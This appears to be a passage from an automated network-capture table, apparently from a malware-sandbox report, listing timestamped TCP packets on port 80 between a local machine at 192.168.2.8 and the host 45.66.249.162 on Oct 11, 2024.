                                                                                                                                                              Oct 11, 2024 22:32:27.536628962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536638021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536643982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536653042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536663055 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536673069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536683083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536691904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536701918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536727905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.536727905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.536727905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.536727905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.536885977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536904097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536914110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536978006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.536988974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537003994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537014008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537029982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537029982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537029982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537029982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537029982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537029982 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537110090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537144899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537216902 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537228107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537275076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537285089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537293911 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537303925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537349939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537349939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537349939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537349939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537349939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537349939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537408113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537416935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537427902 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537461042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537471056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537481070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537491083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537534952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537534952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537534952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537586927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537587881 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537823915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537833929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537844896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537904978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537904978 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537904978 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.537914991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537925005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537930012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.537962914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538042068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538053036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538060904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538060904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538070917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538080931 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538090944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538105965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538115978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538125992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538130999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538136005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538142920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538142920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538146973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538158894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538166046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538166046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538167953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538180113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538187981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538264990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538264990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538846016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538861990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538872004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538881063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538891077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538899899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538916111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.538948059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538948059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538976908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.538976908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539000988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539011002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539016008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539026022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539036036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539045095 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539050102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539061069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539062977 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539129019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539139032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539148092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539158106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539167881 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539177895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539189100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539205074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539205074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539205074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539205074 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539406061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539406061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539731026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539774895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.539820910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539845943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.539880991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.540374994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.540374994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.540374994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623483896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623568058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623573065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623588085 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623660088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623682022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623693943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623702049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623702049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623702049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623713017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623723984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623743057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623756886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623770952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623795986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623811960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623821974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623821974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623821974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623821974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623821974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623821974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623827934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623842001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623848915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623923063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623933077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623933077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623956919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.623967886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.623976946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624032021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624032021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624067068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624078035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624103069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624123096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624134064 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624147892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624147892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624147892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624174118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624185085 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624191046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624191046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624201059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624208927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624222994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624233007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624239922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624239922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624257088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624258995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624309063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624309063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624490023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624537945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624547958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624562025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624599934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624610901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624629021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624639034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624639034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624639034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624644041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624661922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624675989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624675989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624692917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624713898 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624811888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624835014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624845982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624874115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624874115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624874115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.624910116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624921083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624939919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624973059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.624986887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625005960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625006914 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625005960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625005960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625005960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625055075 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625055075 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625152111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625164032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625186920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625200033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625251055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625251055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625251055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625251055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625287056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625329971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625335932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625372887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625417948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625417948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625421047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625477076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625504971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625519991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625528097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625528097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625533104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625555038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625608921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625608921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625608921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625611067 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625623941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625664949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625664949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625781059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625806093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625818014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625819921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625838041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625869989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625870943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625870943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625900984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625922918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625941992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625956059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625962019 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625962019 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625989914 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.625992060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.625992060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626051903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626065016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626108885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626118898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626125097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626125097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626125097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626147032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626194954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626194954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626194954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626490116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626514912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626529932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626547098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626560926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626589060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626589060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626589060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626589060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626610041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626616955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626626968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626663923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626673937 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626673937 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626713037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626722097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626734018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626754045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626822948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626822948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626822948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626836061 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626847982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.626919985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626919985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.626950979 CEST804970745.66.249.162192.168.2.8
